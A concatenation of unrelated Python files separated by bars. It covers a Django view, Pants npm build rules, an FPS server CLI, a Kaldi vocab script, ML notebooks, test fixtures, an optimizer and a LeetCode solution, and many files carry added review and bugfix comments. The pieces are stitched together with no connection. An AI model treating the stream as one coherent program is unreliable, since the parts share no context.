    def delete(self, request, project_id=None, category_name=None, *args, **kwargs):
        try:
            instance = ProjectCategory.objects.get(
                project_id=project_id, category__name=category_name)
            if instance.project.user_id != request.user.id:
                raise ValueError('Must be project creator')
        except ValueError:
            return Response(status=HTTP_401_UNAUTHORIZED)
        # BUGFIX: narrowed from a bare ``except:``.
        except Exception:
            return Response(status=HTTP_400_BAD_REQUEST)
        log_event(request, instance, None, DELETE)
        instance.delete()
        return Response(status=HTTP_204_NO_CONTENT)
|
import logging
from dataclasses import dataclass
from pathlib import PurePath
from pants.core.goals.package import BuiltPackage, BuiltPackageArtifact
from pants.core.util_rules.external_tool import (DownloadedExternalTool,
ExternalToolRequest)
from pants.core.util_rules.source_files import SourceFiles, SourceFilesRequest
from pants.core.util_rules.stripped_source_files import StrippedSourceFiles
from pants.engine.environment import Environment, EnvironmentRequest
from pants.engine.fs import (AddPrefix, Digest, FileContent, MergeDigests,
PathGlobs, RemovePrefix, Snapshot)
from pants.engine.platform import Platform
from pants.engine.process import (BinaryPathRequest, BinaryPaths, Process,
ProcessResult)
from pants.engine.rules import Get, MultiGet, collect_rules, rule
from pants.engine.target import (Target, TransitiveTargets,
TransitiveTargetsRequest)
from pants.engine.unions import UnionMembership, UnionRule
from .target import NodeLibrary, NodeLibrarySources, NodeProjectFieldSet
from sendwave.pants_docker.docker_component import DockerComponent, DockerComponentFieldSet
logger = logging.getLogger(__name__)
@dataclass(frozen=True)
class PackageFileRequest:
    """Request for the npm manifest/lockfiles rooted at ``package_root``."""
    # Path (relative to the build root) of the directory holding package.json.
    package_root: str
@rule
async def get_npm_package_files(request: PackageFileRequest) -> Digest:
    """Capture the npm manifest and lockfiles under the package root and
    return them as a digest relative to the package directory (i.e. with the
    root prefix stripped)."""
    project_root = PurePath(request.package_root)
    # Only these four files are relevant to dependency installation.
    manifest_globs = [
        str(project_root.joinpath("package.json")),
        str(project_root.joinpath("package-lock.json")),
        str(project_root.joinpath("yarn.lock")),
        str(project_root.joinpath("npm-shrinkwrap.json")),
    ]
    rooted_configs = await Get(Digest, PathGlobs(manifest_globs))
    # BUGFIX: RemovePrefix expects the prefix as a string; passing the
    # PurePath object through to the engine is not guaranteed to work.
    unrooted_configs = await Get(Digest, RemovePrefix(rooted_configs, str(project_root)))
    return unrooted_configs
@dataclass(frozen=True)
class NodeSourceFilesRequest:
    """Request for the stripped source files of a node package target."""
    # Address of the package target; NOTE(review): callers pass an Address
    # object despite the str annotation -- confirm the intended type.
    package_address: str
@rule
async def get_node_package_file_sources(
    request: NodeSourceFilesRequest,
) -> StrippedSourceFiles:
    """Collect the stripped sources of the package target and everything in
    its transitive dependency closure."""
    closure = await Get(
        TransitiveTargets, TransitiveTargetsRequest([request.package_address])
    )
    sources_fields = [
        tgt.get(NodeLibrarySources)
        for tgt in closure.closure
        if tgt.has_field(NodeLibrarySources)
    ]
    return await Get(StrippedSourceFiles, SourceFilesRequest(sources_fields))
@rule
async def get_node_package_digest(field_set: NodeProjectFieldSet) -> Digest:
    """Build a node project and capture its artifacts as a digest.

    Runs `npm install` followed by `npm run-script pants:build` in a
    sandbox composed of the package's config files and stripped sources,
    then returns the configured artifact directories, optionally
    re-rooted under the field set's output_path.
    """
    artifact_paths = field_set.artifact_paths.value
    # Fetch config files, sources and the NVM_BIN env var concurrently.
    package_files, source_files, nvm_bin = await MultiGet(
        Get(Snapshot, PackageFileRequest(field_set.address.spec_path)),
        Get(StrippedSourceFiles, NodeSourceFilesRequest(field_set.address)),
        Get(Environment, EnvironmentRequest(["NVM_BIN"])),
    )
    build_context = await Get(
        Snapshot, MergeDigests([source_files.snapshot.digest, package_files.digest])
    )
    # Prefer an nvm-managed npm (if NVM_BIN is set) over the system locations.
    search_path = []
    if nvm_bin:
        search_path.append(nvm_bin.get("NVM_BIN"))
    search_path.extend(["/bin", "/usr/bin", "/usr/local/bin"])
    npm_paths = await Get(
        BinaryPaths,
        BinaryPathRequest(
            binary_name="npm",
            search_path=search_path,
        ),
    )
    if not npm_paths.first_path:
        raise ValueError("Could not find npm in path: {} cannot create package"
                         .format(":".join(search_path)))
    npm_path = npm_paths.first_path.path  # NOTE(review): unused; the calls below re-read first_path.path
    npm_install_result = await Get(
        ProcessResult,
        Process(
            argv=[npm_paths.first_path.path, "install"],
            output_directories=["./node_modules"],
            input_digest=build_context.digest,
            env={"PATH": ":".join(search_path)},
            description="installing node project dependencies",
        ),
    )
    logger.debug(npm_install_result.stdout)
    # Merge the freshly installed node_modules back into the build context.
    build_context = await Get(
        Snapshot, MergeDigests([build_context.digest, npm_install_result.output_digest])
    )
    proc = await Get(
        ProcessResult,
        Process(
            description="Running npm run-script pants:build",
            argv=[npm_paths.first_path.path, "run-script", "pants:build"],
            input_digest=build_context.digest,
            output_directories=artifact_paths,
            env={"PATH": ":".join(search_path)},
        ),
    )
    logger.debug(proc.stdout)
    # Optionally re-root the artifacts under the requested output path.
    if field_set.output_path:
        return await Get(Digest, AddPrefix(proc.output_digest, field_set.output_path.value))
    return proc.output_digest
@rule
async def node_project_package(
    field_set: NodeProjectFieldSet,
) -> BuiltPackage:
    """Package a node project, exposing every built file as an artifact."""
    # NOTE(review): this requests a Snapshot from NodeProjectFieldSet while the
    # rule above produces a Digest for that input — confirm the engine can
    # satisfy this Get as written.
    package = await Get(Snapshot, NodeProjectFieldSet, field_set)
    return BuiltPackage(
        digest=package.digest,
        artifacts=tuple(BuiltPackageArtifact(f) for f in package.files),
    )
@rule
async def node_project_docker(
    field_set: NodeProjectFieldSet,
) -> DockerComponent:
    """Expose the built node package as a Docker component with no extra commands."""
    package = await Get(Digest, NodeProjectFieldSet, field_set)
    return DockerComponent(sources=package, commands=[])
def rules():
    """Return the pants rules for this module."""
    return [
        # NOTE(review): a self-referential UnionRule is unusual — the first
        # argument is normally an abstract union base (e.g. a package or
        # docker field-set union); confirm this registration is intentional.
        UnionRule(NodeProjectFieldSet, NodeProjectFieldSet),
        UnionRule(DockerComponentFieldSet, NodeProjectFieldSet),
        *collect_rules(),
    ]
|
import logging
import os
import threading
import webbrowser
from typing import Any, Dict, List
import toml
import typer
import uvicorn
from fps_uvicorn.config import UvicornConfig
from fps.config import Config
from fps.logging import configure_loggers, get_loggers_config
from fps.utils import merge_dicts
app = typer.Typer()
def parse_extra_options(options: List[str]) -> Dict[str, Any]:
    """Turn raw '--plugin.option[=value]' CLI tokens into a nested dict.

    Supported shapes: '--a.b=v', '--a.b v' (value in the next token) and
    bare flags '--a.b' (stored as the string "true"). Comma-separated
    values become lists; surrounding '[' ']' brackets are stripped.

    Raises:
        typer.Abort: if a token does not start with '--'.
        AttributeError: if a key has no '<plugin>.<option>' dot.
        ValueError: if a dotted key has an empty component.
    """
    def unnested_option(key: str, val: str, root: bool = True) -> Dict[str, Any]:
        # Recursively expand 'a.b.c' into {'a': {'b': {'c': val}}}.
        if "." in key:
            k1, k2 = key.split(".", maxsplit=1)
            if not k1 or not k2:
                raise ValueError(f"Ill-formed option key '{key}'")
            try:
                return {k1: unnested_option(k2, val, False)}
            except ValueError as e:
                # At the root, re-raise with the full key for a clearer message.
                if root:
                    raise ValueError(f"Ill-formed option key '{key}'")
                else:
                    raise e
        else:
            # A dot-less top-level key cannot be attributed to a plugin.
            if root:
                raise AttributeError(
                    f"Plugin option must be of the form '<plugin-name>.<option>', got '{key}'"
                )
            if "," in val:
                if val.startswith("[") and val.endswith("]"):
                    return {key: [v.strip() for v in val[1:-1].split(",")]}
                else:
                    return {key: [v.strip() for v in val.split(",")]}
            else:
                return {key: val}
    formatted_options: Dict[str, Any] = {}
    i = 0
    while i < len(options):
        opt = options[i]
        # ill-formed extra config
        if not opt.startswith("--"):
            typer.echo(f"Optional config should start with '--', got '{opt}'")
            raise typer.Abort()
        if "=" in opt:
            # option is --key=value
            k, v = opt[2:].split("=", maxsplit=1)
            merge_dicts(formatted_options, unnested_option(k, v))
        else:
            if i + 1 < len(options):
                # option if a flag --key
                if options[i + 1].startswith("--"):
                    merge_dicts(formatted_options, unnested_option(opt[2:], "true"))
                # option is --key value
                else:
                    merge_dicts(
                        formatted_options, unnested_option(opt[2:], options[i + 1])
                    )
                    # Consumed the value token as well as the key token.
                    i += 1
            # option if a flag --key
            else:
                merge_dicts(formatted_options, unnested_option(opt[2:], "true"))
        i += 1
    return formatted_options
def store_extra_options(options: List[str]):
    """Persist unparsed CLI plugin options for the FPS config loader.

    Parses raw ``--plugin.option[=value]`` tokens (as produced by
    ``typer.Context.args``) into a nested dict, writes it to a TOML
    file, and exports the file's path via ``FPS_CLI_CONFIG_FILE`` so
    the application picks it up at startup. No-op when ``options`` is
    empty.

    Note: the previous annotation (``Dict[str, Any]``) was wrong — this
    function receives the raw token list, not a mapping.
    """
    if options:
        opts = parse_extra_options(options)
        f_name = "fps_cli_args.toml"
        with open(f_name, "w") as f:
            toml.dump(opts, f)
        os.environ["FPS_CLI_CONFIG_FILE"] = f_name
@app.command(
    context_settings={"allow_extra_args": True, "ignore_unknown_options": True}
)
def start(
    ctx: typer.Context,
    host: str = None,
    port: int = None,
    root_path: str = None,
    reload: bool = typer.Option(
        None,
        help=(
            "Enable/disable automatic reloading of the server when sources are modified"
        ),
    ),
    reload_dirs: str = ".",
    open_browser: bool = typer.Option(
        None,
        help=("Enable/disable automatic automatic opening of the browser"),
    ),
    config: str = None,
    workers: int = None,
):
    """Start the FPS application under uvicorn.

    Explicit CLI options override values from the registered
    UvicornConfig; unrecognized '--plugin.option' arguments are handed
    to store_extra_options for the FPS config loader.
    """
    logger = logging.getLogger("fps")
    if config:
        if os.path.isfile(config):
            os.environ["FPS_EXTRA_CONFIG_FILE"] = config
        else:
            logger.error(f"Invalid configuration file '{config}'")
            exit(1)
    # Persist plugin options passed after the known flags.
    store_extra_options(ctx.args)
    Config.register("uvicorn", UvicornConfig)
    # NOTE(review): 'config' is re-bound here from the CLI path (str) to the
    # Config object; intentional but easy to misread.
    config = Config(UvicornConfig)
    # CLI arguments win over configuration-file values.
    host = host or config.host
    port = port or config.port
    root_path = root_path or config.root_path
    reload = reload if reload is not None else config.reload
    open_browser = open_browser if open_browser is not None else config.open_browser
    workers = workers or config.workers
    if open_browser:
        # Fire-and-forget: the browser opens while uvicorn starts up.
        threading.Thread(target=launch_browser, args=(host, port), daemon=True).start()
    configure_loggers(("uvicorn", "uvicorn.access", "uvicorn.error"))
    uvicorn.run(
        "fps.main:app",
        host=host,
        port=port,
        root_path=root_path,
        workers=workers,
        log_config=get_loggers_config(),
        reload=reload,
        reload_dirs=reload_dirs,
    )
def launch_browser(host: str, port: int):
    """Open the served application in a new browser window.

    BUGFIX: the scheme is now added explicitly — without it,
    ``webbrowser`` treats "host:port" as an opaque/relative URL and may
    fail to open it (behavior varies by platform/browser).
    """
    webbrowser.open_new(f"http://{host}:{port}")
|
#!/usr/bin/env python3
# Copyright 2017 Jian Wang
# License: Apache 2.0.
import os
import argparse
import sys
# Re-wrap stdout as latin-1 regardless of locale, matching the encoding
# used to read the counts files below.
sys.stdout = open(1, 'w', encoding='latin-1', closefd=False)
import re
# A run of spaces and/or tabs — the field separator in counts files.
tab_or_space = re.compile('[ \t]+')
parser = argparse.ArgumentParser(description="This script get a vocab from unigram counts "
                                 "of words produced by get_unigram_counts.sh",
                                 epilog="E.g. " + sys.argv[0] + " data/rnnlm/data > data/rnnlm/vocab/words.txt",
                                 formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("data_dir",
                    help="Directory in which to look for unigram counts.")
args = parser.parse_args()
# NOTE(review): eos_symbol and special_symbols are defined for documentation
# purposes but never referenced below (the loop compares against "</s>" directly).
eos_symbol = '</s>'
special_symbols = ['<s>', '<brk>', '<eps>']
# Add the count for every word in counts_file
# the result is written into word_counts
def add_counts(word_counts, counts_file):
    """Accumulate per-word counts from one whitespace-separated counts file.

    Each line must contain exactly two fields: <word> <count>. Counts
    are added into the word_counts dict in place.

    Raises:
        ValueError: on a line that does not have exactly two fields
            (replaces the old ``assert``, which disappears under -O).
    """
    with open(counts_file, 'r', encoding="latin-1") as f:
        for line in f:
            # str.split() collapses runs of spaces/tabs and strips the
            # trailing newline, replacing the per-line regex split.
            fields = line.split()
            if len(fields) != 2:
                raise ValueError("malformed line in {0}: '{1}'"
                                 .format(counts_file, line.rstrip()))
            word, count = fields
            word_counts[word] = word_counts.get(word, 0) + int(count)
# Accumulate unigram counts across every *.counts file in data_dir.
word_counts = {}
for f in os.listdir(args.data_dir):
    full_path = args.data_dir + "/" + f
    if os.path.isdir(full_path):
        continue
    if f.endswith(".counts"):
        add_counts(word_counts, full_path)
if len(word_counts) == 0:
    sys.exit(sys.argv[0] + ": Directory {0} should contain at least one .counts file "
             .format(args.data_dir))
# Fixed ids for the special symbols; real words start at id 4.
print("<eps> 0")
print("<s> 1")
print("</s> 2")
print("<brk> 3")
idx = 4
# Emit words by descending count; </s> already has a fixed id above.
for word, _ in sorted(word_counts.items(), key=lambda x: x[1], reverse=True):
    if word == "</s>":
        continue
    print("{0} {1}".format(word, idx))
    idx += 1
# NOTE(review): idx includes the 4 special symbols, so the reported total is
# the full vocabulary size, not just the corpus word count.
print(sys.argv[0] + ": vocab is generated with {0} words.".format(idx), file=sys.stderr)
|
import os
import pytest
from datadog_checks.dev import docker_run
from .common import INSTANCES
HERE = os.path.dirname(os.path.abspath(__file__))
DOCKER_DIR = os.path.join(HERE, 'docker')
@pytest.fixture(scope='session', autouse=True)
def dd_environment():
    """Spin up the flavored docker-compose stack and yield the main instance."""
    compose_flavor = os.getenv('FLAVOR', 'default')
    compose_file = os.path.join(DOCKER_DIR, compose_flavor, 'docker-compose.yaml')
    main_instance = INSTANCES['main']
    # The stack is torn down automatically when the session ends.
    with docker_run(compose_file, build=True, endpoints=main_instance['stats_url']):
        yield main_instance
|
from ..api import get_many, ApiVersion, int_field, date_field
from datetime import date
from typing import Iterator, List, Optional
class OckovaniDistribuceSklad:
    """Overview of COVID-19 vaccine distribution from the central warehouse (CZ).

    The dataset covers receipts into the central warehouse and issues
    from it to vaccination sites in the Czech Republic. Each record
    (row) gives the number of vials of a given vaccine received or
    dispatched on a given day.

    Attributes
    ----------
    datum: date
        Date on which the action (distribution record) was entered into the system.
    akce: str
        Flag saying whether the record is a receipt into the central warehouse
        (ordered or already received deliveries — a receipt does not always
        mean the delivery is physically in stock) or an issue from the central
        warehouse to a healthcare provider (per the National Registry of
        Healthcare Providers, NRPZS), optionally naming a specific vaccination
        site. nrpzs_kod/nrpzs_nazev are mandatory for issues;
        ockovaci_misto_id/ockovaci_misto_nazev are mandatory only when the
        provider is itself a vaccination site.
    vyrobce: str
        Manufacturer name of the distributed vaccine.
    pocet_ampulek: int
        Number of vials involved in the action (receipt or issue). Doses per
        vial: Comirnaty (Pfizer) = 6, VAXZEVRIA = 10, Spikevax (Moderna) = 10,
        COVID-19 Vaccine Janssen = 5.
    nrpzs_kod: str
        Healthcare-provider identifier per the NRPZS registry.
    nrpzs_nazev: str
        Healthcare-provider name per the NRPZS registry.
    nrpzs_kraj_nazev: str
        Region name of the provider's registered seat per the NRPZS registry.
    ockovaci_misto_id: str
        Unique identifier of the vaccination site.
    ockovaci_misto_nazev: str
        Name of the vaccination site.
    distribuce_id: str
        Identifier of the action (distribution record), joinable with the
        dataset on vaccine distribution between vaccination sites.
    """
    def __init__(self, line: List[str]) :
        """Build one record from a CSV row with a fixed column order."""
        self.datum: Optional[date] = date_field(line[0])
        self.akce: str = line[1]
        self.vyrobce: str = line[2]
        self.pocet_ampulek: int = int_field(line[3])
        self.nrpzs_kod: str = line[4]
        self.nrpzs_nazev: str = line[5]
        self.nrpzs_kraj_nazev: str = line[6]
        self.ockovaci_misto_id: str = line[7]
        self.ockovaci_misto_nazev: str = line[8]
        self.distribuce_id: str = line[9]
    @staticmethod
    def get(cache_dir: Optional[str]) -> Iterator['OckovaniDistribuceSklad'] :
        """Stream all records of the 'ockovani-distribuce-sklad' dataset (API v2)."""
        return get_many('ockovani-distribuce-sklad',
                        OckovaniDistribuceSklad,
                        ApiVersion.V2,
                        cache_dir)
|
from sklearn.utils import all_estimators
from sklearn.utils.estimator_checks import _construct_instance
from sklearn.utils._testing import SkipTest
from docutils import nodes
from contextlib import suppress
from docutils.parsers.rst import Directive
class AllowNanEstimators(Directive):
    """Sphinx directive listing every scikit-learn estimator whose tags allow NaN."""

    @staticmethod
    def make_paragraph_for_estimator_type(estimator_type):
        """Build a bullet list of allow-NaN estimators for one type filter.

        Returns a single-item list of docutils nodes, or None when no
        estimator of this type allows NaN input.
        """
        intro = nodes.list_item()
        intro += nodes.strong(text="Estimators that allow NaN values for type ")
        intro += nodes.literal(text=f"{estimator_type}")
        intro += nodes.strong(text=":\n")
        exists = False
        lst = nodes.bullet_list()
        for name, est_class in all_estimators(type_filter=estimator_type):
            # _construct_instance raises SkipTest for estimators that cannot
            # be built with default arguments; those are silently skipped.
            with suppress(SkipTest):
                est = _construct_instance(est_class)
                if est._get_tags().get("allow_nan"):
                    module_name = ".".join(est_class.__module__.split(".")[:2])
                    class_title = f"{est_class.__name__}"
                    # Link into the generated API reference pages.
                    class_url = f"./generated/{module_name}.{class_title}.html"
                    item = nodes.list_item()
                    para = nodes.paragraph()
                    para += nodes.reference(
                        class_title, text=class_title, internal=False, refuri=class_url
                    )
                    exists = True
                    item += para
                    lst += item
        intro += lst
        return [intro] if exists else None

    def run(self):
        """Emit one section per estimator type that has allow-NaN estimators."""
        lst = nodes.bullet_list()
        for i in ["cluster", "regressor", "classifier", "transformer"]:
            item = self.make_paragraph_for_estimator_type(i)
            if item is not None:
                lst += item
        return [lst]
def setup(app):
    """Register the allow_nan_estimators directive with Sphinx."""
    app.add_directive("allow_nan_estimators", AllowNanEstimators)
    extension_metadata = {
        "version": "0.1",
        "parallel_read_safe": True,
        "parallel_write_safe": True,
    }
    return extension_metadata
|
# --------------
import pandas as pd
from sklearn.model_selection import train_test_split
#path - Path of file
# Code starts here
# NOTE(review): `path` is injected by the hosting platform (see comment above);
# this chunk is not runnable standalone.
df=pd.read_csv(path)
# Features: everything except the id column and the target.
X=df.drop(['customerID','Churn'], 1).copy()  # NOTE(review): positional axis is deprecated in newer pandas; prefer axis=1
y=df.Churn
# 70/30 train-test split with a fixed seed for reproducibility.
X_train,X_test,y_train,y_test=train_test_split(X, y, test_size = 0.3, random_state = 0)
# --------------
import numpy as np
from sklearn.preprocessing import LabelEncoder
# Code starts here
# TotalCharges is read as object because blanks (' ') appear in the raw data;
# coerce blanks to NaN, cast to float, then impute with the column mean.
# NOTE(review): the test column is imputed with the *test* mean, as in the
# original; imputing with the train mean would be stricter.
X_train['TotalCharges']=X_train.TotalCharges.replace(' ', np.NaN).astype(float)
X_test['TotalCharges']=X_test.TotalCharges.replace(' ', np.NaN).astype(float)
X_train['TotalCharges']=X_train.TotalCharges.fillna(X_train.TotalCharges.mean())
X_test['TotalCharges']=X_test.TotalCharges.fillna(X_test.TotalCharges.mean())
X_train.isna().sum()
# BUGFIX: the original fit a *fresh* LabelEncoder on the test set, so train
# and test could map the same category to different integers. Fit one encoder
# per column on the training data and reuse it to transform the test data.
for col in X_train.select_dtypes(include=object).columns:
    lb = LabelEncoder()
    X_train[col] = lb.fit_transform(X_train[col])
    X_test[col] = lb.transform(X_test[col])
# Binary-encode the target.
y_train=y_train.replace({'No':0, 'Yes':1})
y_test=y_test.replace({'No':0, 'Yes':1})
# --------------
from sklearn.ensemble import AdaBoostClassifier
from sklearn.metrics import accuracy_score,classification_report,confusion_matrix
# Code starts here
print(X_train.head(3), '\n', X_test.head(3), '\n', y_train.head(3), '\n', y_test.head(3))
# Baseline ensemble: AdaBoost with default hyperparameters and a fixed seed.
ada_model=AdaBoostClassifier(random_state=0)
ada_model.fit(X_train, y_train)
y_pred=ada_model.predict(X_test)
# Held-out evaluation: accuracy, confusion matrix and per-class report.
ada_score=accuracy_score(y_test, y_pred)
ada_cm=confusion_matrix(y_test, y_pred)
ada_cr=classification_report(y_test, y_pred)
print(ada_cm, '\n', ada_cr, '\n', ada_score)
# --------------
from xgboost import XGBClassifier
from sklearn.model_selection import GridSearchCV
#Parameter list
parameters={'learning_rate':[0.1,0.15,0.2,0.25,0.3],
            'max_depth':range(1,3)}
# Code starts here
# Plain XGBoost baseline with default hyperparameters.
xgb_model=XGBClassifier(random_state=0)
xgb_model.fit(X_train, y_train)
y_pred=xgb_model.predict(X_test)
xgb_score=accuracy_score(y_test, y_pred)
xgb_cm=confusion_matrix(y_test, y_pred)
xgb_cr=classification_report(y_test, y_pred)
print('the results for XGB are:', xgb_cm, '\n', xgb_cr, '\n', xgb_score)
# Grid search over learning_rate and max_depth; predictions below use the
# refit best estimator.
clf_model=GridSearchCV(estimator=xgb_model, param_grid=parameters)
clf_model.fit(X_train, y_train)
y_pred=clf_model.predict(X_test)
clf_score=accuracy_score(y_test, y_pred)
clf_cm=confusion_matrix(y_test, y_pred)
clf_cr=classification_report(y_test, y_pred)
print('the results for grid search are:', clf_cm, '\n', clf_cr, '\n', clf_score)
|
from unet3d.config import load_config
import os
import torch
import torch.nn as nn
import datetime
from datasets.hdf5 import BratsDataset
from unet3d.model import get_model
from unet3d import utils
from tensorboardX import SummaryWriter
from visualization import board_add_images, board_add_image
def get_job_name():
    """Return a timestamped job name, e.g. '2020-01-31.23:59_model'."""
    timestamp = datetime.datetime.now().strftime('%Y-%m-%d.%H:%M')
    return timestamp + "_model"
logger = utils.get_logger('UNet3DPredictor')
# Load and log experiment configuration
config = load_config()
# Load model state
model = get_model(config)
model_path = config['trainer']['test_model']
logger.info(f'Loading model from {model_path}...')
utils.load_checkpoint(model_path, model)
logger.info(f"Sending the model to '{config['default_device']}'")
# NOTE(review): the log line mentions config['default_device'] but the model
# is moved to the hard-coded 'cuda:0' — confirm these agree.
model = model.to('cuda:0')
predictionsBasePath = config['loaders']['pred_path']
BRATS_VAL_PATH = config['loaders']['test_path']
# Validation set without ground-truth masks; offsets are returned so each
# prediction can be pasted back into the full volume.
challengeValset = BratsDataset(BRATS_VAL_PATH[0], mode="validation", hasMasks=False, returnOffsets=True)
challengeValloader = torch.utils.data.DataLoader(challengeValset, batch_size=1, shuffle=False, pin_memory=True, num_workers=1)
writer = SummaryWriter(logdir=os.path.join(predictionsBasePath[0], get_job_name()))
def makePredictions():
    """Run inference over the validation loader and write one .nii.gz label
    volume per patient, logging mid-slice images to TensorBoard."""
    # model is already loaded from disk by constructor
    basePath = os.path.join(predictionsBasePath[0])
    if not os.path.exists(basePath):
        os.makedirs(basePath)
    with torch.no_grad():
        for i, data in enumerate(challengeValloader):
            inputs, pids, xOffset, yOffset, zOffset = data
            print('***********************************')
            print("processing {}".format(pids[0]))
            inputs = inputs.to('cuda:0')
            # predict labels and bring into required shape
            outputs = model(inputs)
            outputs = outputs[:, :, :, :, :155]
            # visualize the feature map to tensorboard
            # input_list = [inputs[0:1, 0:1, :, :, 64], inputs[0:1, 1:2, :, :, 64], inputs[0:1, 2:3, :, :, 64],
            #               inputs[0:1, 3:4, :, :, 64]]
            # NOTE(review): `max`/`min` shadow the builtins; used only for logging.
            max = inputs.max()
            min = inputs.min()
            print(f'max:{max} min:{min}')
            print('***********************************')
            # Mid-slice (index 64 on the last axis) views of the four input channels.
            Flair = [inputs[0:1, 0:1, :, :, 64]]
            T1 = [inputs[0:1, 1:2, :, :, 64]]
            T1ce = [inputs[0:1, 2:3, :, :, 64]]
            T2 = [inputs[0:1, 3:4, :, :, 64]]
            pred_list = [outputs[0:1, :, :, :, 64]]
            board_add_images(writer, f'{pids[0]}/Flair', Flair, 0)
            board_add_images(writer, f'{pids[0]}/T1', T1, 0)
            board_add_images(writer, f'{pids[0]}/T1ce', T1ce, 0)
            board_add_images(writer, f'{pids[0]}/T2', T2, 0)
            board_add_images(writer, f'{pids[0]}/pred', pred_list, 0)
            # Paste the (possibly cropped) prediction into a full 240x240x155
            # volume at the recorded offsets, clipping any overhang first.
            s = outputs.shape
            fullsize = outputs.new_zeros((s[0], s[1], 240, 240, 155))
            if xOffset + s[2] > 240:
                outputs = outputs[:, :, :240 - xOffset, :, :]
            if yOffset + s[3] > 240:
                outputs = outputs[:, :, :, :240 - yOffset, :]
            if zOffset + s[4] > 155:
                outputs = outputs[:, :, :, :, :155 - zOffset]
            fullsize[:, :, xOffset:xOffset + s[2], yOffset:yOffset + s[3], zOffset:zOffset + s[4]] = outputs
            # binarize output
            # Per the variable names the channels are whole tumor / tumor core /
            # enhancing tumor, thresholded independently. Later assignments
            # overwrite earlier ones, so label priority is et(4) > tc(1) > wt(2).
            wt, tc, et = fullsize.chunk(3, dim=1)
            s = fullsize.shape
            wt = (wt > 0.6).view(s[2], s[3], s[4])
            tc = (tc > 0.5).view(s[2], s[3], s[4])
            et = (et > 0.7).view(s[2], s[3], s[4])
            result = fullsize.new_zeros((s[2], s[3], s[4]), dtype=torch.uint8)
            result[wt] = 2
            result[tc] = 1
            result[et] = 4
            npResult = result.cpu().numpy()
            # NOTE(review): these shadow builtins and the values are unused.
            max = npResult.max()
            min = npResult.min()
            path = os.path.join(basePath, "{}.nii.gz".format(pids[0]))
            utils.save_nii(path, npResult, None, None)
    print("Done :)")
if __name__ == "__main__":
    # Entry point: run inference over the validation loader defined above.
    makePredictions()
import mock
import unittest
from tests.tests_data import fake_talk_json
from tests.tests_data import fake_empty_talk_json
from worker.api import API
def mocked_requests_get(*args, **kwargs):
    """Stand-in for requests.get that returns a 200 response with a talk payload."""
    class StubResponse:
        def __init__(self, payload, status):
            self.json_data = payload
            self.status_code = status

        def json(self):
            return self.json_data

    return StubResponse(fake_talk_json, 200)
def mocked_requests_get_fails(*args, **kwargs):
    """Stand-in for requests.get that returns a 500 response with an empty payload."""
    class StubResponse:
        def __init__(self, payload, status):
            self.json_data = payload
            self.status_code = status

        def json(self):
            return self.json_data

    return StubResponse(fake_empty_talk_json, 500)
class APITest(unittest.TestCase):
    """Unit tests for worker.api.API.get_random_talk with a mocked requests.get."""

    @mock.patch('requests.get', side_effect=mocked_requests_get)
    def test_get_random_talk(self, mock_get):
        # A 200 response should yield the parsed JSON payload as a dict.
        api = API()
        talk_json = api.get_random_talk()
        self.assertIsNotNone(talk_json)
        self.assertIsInstance(talk_json, dict)

    @mock.patch('requests.get', side_effect=mocked_requests_get_fails)
    def test_get_random_talk_fails(self, mock_get):
        # A 500 response is expected to yield None rather than raising.
        api = API()
        talk_json = api.get_random_talk()
        self.assertIsNone(talk_json)
|
from __future__ import print_function, division
from evoltier.optimizer import Optimizer
from evoltier.model.bernoulli import Bernoulli
class BernoulliNaturalGradientOptimizer(Optimizer):
    """Natural-gradient optimizer over a Bernoulli distribution's parameters.

    Each update moves ``theta`` along the weighted sample deviation
    ``sum_i w_i * (x_i - theta)`` scaled by the learning rate.
    """

    def __init__(self, weight_function, lr, distribution=None, dim=None):
        """
        Args:
            weight_function: maps evaluation values to per-sample weights.
            lr: learning-rate object exposing ``set_parameters`` and ``eta``.
            distribution: Bernoulli distribution to optimize (optional).
            dim: dimensionality used to build a fresh Bernoulli when no
                distribution is given.

        Raises:
            ValueError: if neither ``dim`` nor ``distribution`` is given.
        """
        if dim is None and distribution is None:
            # BUGFIX: the original printed a message and executed a bare
            # ``raise`` with no active exception, which itself fails with
            # "RuntimeError: No active exception to re-raise". Raise a
            # descriptive error instead.
            raise ValueError('Need to set argument "dim" or "distribution"')
        dist = distribution if distribution is not None else Bernoulli(dim=dim)
        super(BernoulliNaturalGradientOptimizer, self).__init__(dist, weight_function, lr)

    def update(self, evals, sample):
        """Advance one generation: reweight, adapt the lr, and step theta."""
        self.t += 1
        weights = self.w_func(evals, xp=self.target.xp)
        self.lr.set_parameters(weights, xp=self.target.xp)
        grad_theta = self.compute_natural_grad(weights, sample, self.target.theta)
        self.target.theta += self.lr.eta * grad_theta

    def compute_natural_grad(self, weights, sample, theta):
        """Return the weighted mean deviation of the samples from theta."""
        xp = self.target.xp
        grad_theta = xp.sum(weights[:, None] * (sample - theta), axis=0)
        return grad_theta

    def get_info_dict(self):
        """Per-generation logging values."""
        info = {'LearningRate': self.lr.eta}
        return info

    def generate_header(self):
        """Column names matching get_info_dict."""
        header = ['LearningRate']
        return header
|
# 802.1X Authentication
|
class Solution:
    def mergeAlternately(self, word1: str, word2: str) -> str:
        """Interleave word1 and word2 one char at a time, then append the
        leftover tail of the longer word."""
        interleaved = [a + b for a, b in zip(word1, word2)]
        shorter = min(len(word1), len(word2))
        return "".join(interleaved) + word1[shorter:] + word2[shorter:]
|
# Expected parsed structure for an ACL summary parser test: per-ACL ACE totals
# plus per-interface attachment points split by direction. The interface
# naming ("Ethernet1/1") and "Router ACL"/"Port ACL" types suggest an NX-OS
# "show access-lists summary" fixture — confirm against the parser under test.
expected_output = {
    "acl": {
        "acl_name": {"total_aces_configured": 1},
        "ipv4_ext": {"total_aces_configured": 0},
    },
    "attachment_points": {
        "Ethernet1/1": {
            "egress": {
                "ipv4_acl": {
                    "total_aces_configured": 3,
                    "active": True,
                    "name": "ipv4_acl",
                    "type": "Router ACL",
                },
                "ipv6_acl2": {
                    "total_aces_configured": 1,
                    "active": True,
                    "name": "ipv6_acl2",
                    "type": "Router ACL",
                },
            },
            "ingress": {
                "ipv6_acl": {
                    "total_aces_configured": 3,
                    "active": True,
                    "name": "ipv6_acl",
                    "type": "Router ACL",
                },
                "mac_acl": {
                    "total_aces_configured": 5,
                    "active": True,
                    "name": "mac_acl",
                    "type": "Port ACL",
                },
                "test22": {
                    "total_aces_configured": 3,
                    "active": True,
                    "name": "test22",
                    "type": "Router ACL",
                },
            },
            "interface_id": "Ethernet1/1",
        }
    },
}
|
"""
# Definition for a Node.
class Node:
def __init__(self, val=None, children=None):
self.val = val
